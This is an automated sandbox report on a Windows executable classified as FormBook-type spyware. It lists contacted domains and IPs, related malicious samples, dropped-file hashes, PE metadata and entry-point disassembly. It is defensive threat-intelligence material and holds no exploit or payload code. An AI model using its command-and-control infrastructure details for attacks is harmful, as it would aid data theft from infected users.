https://mgmasistencia.com/blog/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://es.wordpress.org/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/comments/feed/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/wp-json/ | sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/contacto/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mgmasistencia.com/feed/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tadalaturbo.online | sXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/docs/manuals/enterprise/ | rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wordpress.org/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/?56gD=FnaXBox54 | sXIYDUFnJY.exe, 00000007.00000002.4130799884.00000000034E0000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/xmlrpc.php?rsd | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy | rasdial.exe, 00000006.00000002.4131381557.0000000006A4A000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003CBA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/ | sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.57.64.102 | www.ayypromo.shop | Bosnia and Herzegowina | 47959 | TELINEABA | false
162.55.254.209 | www.anaidittrich.com | United States | 35893 | ACPCA | false
167.172.133.32 | www.onlytradez.club | United States | 14061 | DIGITALOCEAN-ASNUS | false
18.183.3.45 | www.cannulafactory.top | United States | 16509 | AMAZON-02US | false
103.224.182.242 | www.xforum.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
192.185.211.122 | tadalaturbo.online | United States | 46606 | UNIFIEDLAYER-AS-1US | false
206.119.82.116 | 32wxd.top | United States | 174 | COGENT-174US | false
85.13.151.9 | www.datensicherung.email | Germany | 34788 | NMM-ASD-02742FriedersdorfHauptstrasse68DE | false
194.233.65.154 | weep.site | Germany | 6659 | NEXINTO-DE | false
104.21.35.73 | www.jiyitf.top | United States | 13335 | CLOUDFLARENETUS | false
45.157.69.194 | www.88nn.pro | Germany | 136933 | GIGABITBANK-AS-APGigabitbankGlobalHK | false
66.29.149.180 | www.jaxo.xyz | United States | 19538 | ADVANTAGECOMUS | true
37.187.158.211 | fontanerourgente.net | France | 16276 | OVHFR | false
64.64.237.133 | gangli.ssywan.com | Canada | 25820 | IT7NETCA | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1503946
Start date and time: 2024-09-04 09:34:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 220204-TF1--00.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 60
• Number of non-executed functions: 259
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target sXIYDUFnJY.exe, PID 4908 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:36:09 | API Interceptor | 10913904x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
176.57.64.102 | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | www.ayypromo.shop/rgqx/
176.57.64.102 | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | www.ayypromo.shop/rgqx/
176.57.64.102 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | Get hash | malicious | FormBook, GuLoader | Browse | www.ayypromo.shop/mktg/
176.57.64.102 | 031215-Revised-01.exe | Get hash | malicious | FormBook | Browse | www.ayypromo.shop/rgqx/
176.57.64.102 | Copy of 01. Bill of Material - 705.exe | Get hash | malicious | FormBook | Browse | www.ayypromo.shop/rgqx/
176.57.64.102 | Pro#U015bba o Wycena - Strony 4-6.vbs | Get hash | malicious | FormBook, GuLoader | Browse | www.ayypromo.shop/mktg/
176.57.64.102 | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | Get hash | malicious | FormBook | Browse | www.ayypromo.shop/6ocx/
162.55.254.209 | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | www.anaidittrich.com/qpwk/
162.55.254.209 | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | www.anaidittrich.com/qpwk/
162.55.254.209 | Copy of 01. Bill of Material - 705.exe | Get hash | malicious | FormBook | Browse | www.anaidittrich.com/qpwk/
167.172.133.32 | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | 031215-Revised-01.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | Copy of 01. Bill of Material - 705.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | RCZ-PI-4057.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | APS-0240226.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/zctj/
167.172.133.32 | Contract.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/h6ky/
167.172.133.32 | draft Proforma Invoice.exe | Get hash | malicious | FormBook | Browse | www.onlytradez.club/h6ky/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.ayypromo.shop | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | 176.57.64.102
www.ayypromo.shop | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | 176.57.64.102
www.ayypromo.shop | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 176.57.64.102
www.ayypromo.shop | 031215-Revised-01.exe | Get hash | malicious | FormBook | Browse | 176.57.64.102
www.ayypromo.shop | Copy of 01. Bill of Material - 705.exe | Get hash | malicious | FormBook | Browse | 176.57.64.102
www.ayypromo.shop | Pro#U015bba o Wycena - Strony 4-6.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 176.57.64.102
www.ayypromo.shop | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | Get hash | malicious | FormBook | Browse | 176.57.64.102
www.cannulafactory.top | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 18.183.3.45
www.cannulafactory.top | 031215-Revised-01.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | Copy of 01. Bill of Material - 705.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | RCZ-PI-4057.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | APS-0240226.exe | Get hash | malicious | FormBook | Browse | 18.183.3.45
www.cannulafactory.top | Pro#U015bba o Wycena - Strony 4-6.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 18.183.3.45
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
DIGITALOCEAN-ASNUS | https://knowledgeable-expert.surge.sh/id.html/ | Get hash | malicious | Unknown | Browse | 138.197.235.123
DIGITALOCEAN-ASNUS | https://pretty-spring.surge.sh/id.html/ | Get hash | malicious | Unknown | Browse | 138.197.235.123
DIGITALOCEAN-ASNUS | http://xsdrt.hanslot88gacor.com/4fBcna16686hpgN1202wmiembuhsb14569WJUNFCAXDHLQZZY1707NPBU18900N17 | Get hash | malicious | Unknown | Browse | 134.122.57.34
DIGITALOCEAN-ASNUS | https://metaverifiedbadges.co/175261668994311/index.php?nick=YWZyaWNhbmJ1c2hjYW1wcw==&id=1526032324 | Get hash | malicious | Unknown | Browse | 161.35.140.50
DIGITALOCEAN-ASNUS | https://metaverifiedbadges.co/175261668994311/index.php?nick=YWZyaWNhbmJ1c2hjYW1wcw==&id=1526032324 | Get hash | malicious | Unknown | Browse | 161.35.140.50
DIGITALOCEAN-ASNUS | https://metaverifiedbadges.co/175261668994311/index.php?nick=YXdlX25haW1hZF9zd2VlZWVldA== | Get hash | malicious | Unknown | Browse | 161.35.140.50
DIGITALOCEAN-ASNUS | https://www.louisvillesports.org/ | Get hash | malicious | Unknown | Browse | 162.243.38.246
DIGITALOCEAN-ASNUS | https://docsend.com/view/s/p589qibnit8ety2y | Get hash | malicious | Unknown | Browse | 45.55.99.106
DIGITALOCEAN-ASNUS | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | 167.172.133.32
DIGITALOCEAN-ASNUS | dll.ps1 | Get hash | malicious | Unknown | Browse | 207.154.255.134
ACPCA | 20-EM-00- PI-INQ-3001.exe | Get hash | malicious | FormBook | Browse | 162.55.254.209
ACPCA | Rockwool group_SKM_C590368369060_417161.pdf.pdf | Get hash | malicious | HTMLPhisher | Browse | 162.0.217.108
ACPCA | PO#86637.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
ACPCA | https://sweet-solomon.67-23-166-125.plesk.page/dave_jackson_tremblay/fouleebel--_--legardaise/victorien--_--.andre/tonysandrine.--_--henedieu/david.hernandez--_--aristizabal | Get hash | malicious | Unknown | Browse | 162.55.246.61
ACPCA | RFQ STR-160-01.exe | Get hash | malicious | FormBook | Browse | 162.55.254.209
ACPCA | firmware.arm-linux-gnueabihf.elf | Get hash | malicious | Unknown | Browse | 162.48.22.207
ACPCA | PI 30_08_2024.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
ACPCA | estado de cuenta adjunto.exe | Get hash | malicious | FormBook | Browse | 162.0.213.72
ACPCA | Izvod racuna u prilogu.exe | Get hash | malicious | DBatLoader, FormBook | Browse | 162.0.213.72
ACPCA | https://bio.to/vCOt6d | Get hash | malicious | HTMLPhisher | Browse |
                  • 162.0.217.108
                  TELINEABA20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
                  • 88.214.61.219
                  KE4cyjDEDO.elfGet hashmaliciousMiraiBrowse
                  • 88.214.61.224
                  http://91.223.169.83Get hashmaliciousUnknownBrowse
                  • 91.223.169.83
                  AMAZON-02UShttps://t.ly/nFp5iGet hashmaliciousUnknownBrowse
                  • 54.231.196.233
                  https://url.au.m.mimecastprotect.com/s/PfBWC4QZ15ukx20VsOfYC4BNEn?domain=incleecl.comGet hashmaliciousUnknownBrowse
                  • 108.138.26.2
                  CraxsLoader.exeGet hashmaliciousRedLineBrowse
                  • 13.48.78.154
                  bb2.exeGet hashmaliciousUnknownBrowse
                  • 3.64.163.50
                  http://www.conchtech.com/Get hashmaliciousUnknownBrowse
                  • 13.33.187.103
                  https://www.nyar-messenger.com/wp-content/87627428349820389/2FA.htmlGet hashmaliciousUnknownBrowse
                  • 3.123.20.17
                  https://www.nyar-messenger.com/wp-content/87627428349820389/Get hashmaliciousUnknownBrowse
                  • 3.123.20.17
                  http://www.swit.as/1eGet hashmaliciousUnknownBrowse
                  • 76.76.21.22
                  https://swit.as/1eGet hashmaliciousUnknownBrowse
                  • 76.76.21.98
                  https://smruti-ranjan-sahoo-tech.github.io/NetflixCloneGet hashmaliciousHTMLPhisherBrowse
                  • 18.244.20.103
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\rasdial.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Reputation:high, very likely benign file
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.993194028254262
                  Encrypted:true
                  SSDEEP:6144:nIypcZ74PSbGZIa3pslSPWxshp29Ed1q1ocXV6i8oTL4wE39f:nIut8a5sl5shw9EfGJV6iBQ3h
                  MD5:29D5C0303EF472D185C3F80544D8A1EB
                  SHA1:9747A915EBA168D6723F72EEE47ADE34E88CA090
                  SHA-256:E106F38411093510087011C357B338B5658560DF92216EB962A8E3E82BFF0569
                  SHA-512:C5B62C02FF2D805DF614F36316C0AC904C8D6DDC49F4424D0BADB0696D009FF0341924B4FBB4AD2381086E78939D2BE3769EC3D222C754F943325790471E2703
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):15318
                  Entropy (8bit):7.605888844595867
                  Encrypted:false
                  SSDEEP:384:lxFB0xI2k6OP/OMsJMIb7OL+rQnxlFdVl2Xzmz+rHiM:l90xIR/tsJ5uLay76KzW
                  MD5:10E3F657E1E225352731BD4115DB0A3E
                  SHA1:1EA7C8B6FF6EFC27C136A2F7A28880693AE2FB33
                  SHA-256:DC8A2B5F4C8F77CFF0A28A7E2ED28F0A5DE81292176F11294DC42E09726C71A6
                  SHA-512:D574677A5F08196EA7E8256F546062A06F8A799638CC74A2E836C2229C306380F5E9BA96BAE8E9BBE038B12F9A84941409A1CC820861AD5540A5E432BD9D0A3B
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.993194028254262
                  Encrypted:true
                  SSDEEP:6144:nIypcZ74PSbGZIa3pslSPWxshp29Ed1q1ocXV6i8oTL4wE39f:nIut8a5sl5shw9EfGJV6iBQ3h
                  MD5:29D5C0303EF472D185C3F80544D8A1EB
                  SHA1:9747A915EBA168D6723F72EEE47ADE34E88CA090
                  SHA-256:E106F38411093510087011C357B338B5658560DF92216EB962A8E3E82BFF0569
                  SHA-512:C5B62C02FF2D805DF614F36316C0AC904C8D6DDC49F4424D0BADB0696D009FF0341924B4FBB4AD2381086E78939D2BE3769EC3D222C754F943325790471E2703
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\220204-TF1--00.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):200730
                  Entropy (8bit):2.756804786587208
                  Encrypted:false
                  SSDEEP:192:dQyw4U1Emh0cHgDQNMo4eutXGlERJGrbmqsaogDVA9+ls4BqlF9HIrwVmclVw6Xx:j
                  MD5:012594164A9B654B9CEE6E03B8DFB589
                  SHA1:855BE45E6EEC2530F907399689C878A7C87060EA
                  SHA-256:5F9CC263CEED31FCC682B595B89D2C0B21111AFD2C5D53564889F74213D3E331
                  SHA-512:7690EC74084A0A530ABDBC081F29906C3FDF6F2D6820552077A44F461D8F42DFD93E33D07725A0C14C900D7B903F996C703FC436C93F30F77ECC1433B1F735A1
                  Malicious:false
                  Reputation:low
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.187205175540543
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:220204-TF1--00.exe
                  File size:1'191'424 bytes
                  MD5:7054b5f008cd2514db7b7cda8149978a
                  SHA1:831951c823052e1e2537006e617c29b4f0f864d2
                  SHA256:c2f4d2c93d321bffcb638ea1c04436cc5d3837af03c9ad2517e7f4d2eebce887
                  SHA512:36313a2f2c2eb8c9e26fea0e81dec22b3b4b55546da577d4cb36b19467af4cf30c19fc5fd7548912108f89243a801a8866319c3cc47b1cc0f54370b6340d58a9
                  SSDEEP:24576:vAHnh+eWsN3skA4RV1Hom2KXMmHaEqKCBR4urob5eV5:Sh+ZkldoPK8YaEXCBR40wi
                  TLSH:7645BD0273D6C036FFAB92739B6AB20156BD79254133852F13981DB9BDB05B1237E263
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:4a786c6652ece047
                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66D7B02E [Wed Sep 4 00:56:14 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007F90C8C244ADh
                  jmp 00007F90C8C17264h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F90C8C173EAh
                  cmp edi, eax
                  jc 00007F90C8C1774Eh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007F90C8C173E9h
                  rep movsb
                  jmp 00007F90C8C176FCh
                  cmp ecx, 00000080h
                  jc 00007F90C8C175B4h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F90C8C173F0h
                  bt dword ptr [004BF324h], 01h
                  jc 00007F90C8C178C0h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007F90C8C1758Dh
                  test edi, 00000003h
                  jne 00007F90C8C1759Eh
                  test esi, 00000003h
                  jne 00007F90C8C1757Dh
                  bt edi, 02h
                  jnc 00007F90C8C173EFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F90C8C173F3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F90C8C17445h
                  bt esi, 03h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x58690 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x7134 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0xc8000 | 0x58690 | 0x58800 | 4da44ab99ea911a52ab8f10c6f852ce8 | False | 0.9667610125353108 | data | 7.966717474567678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
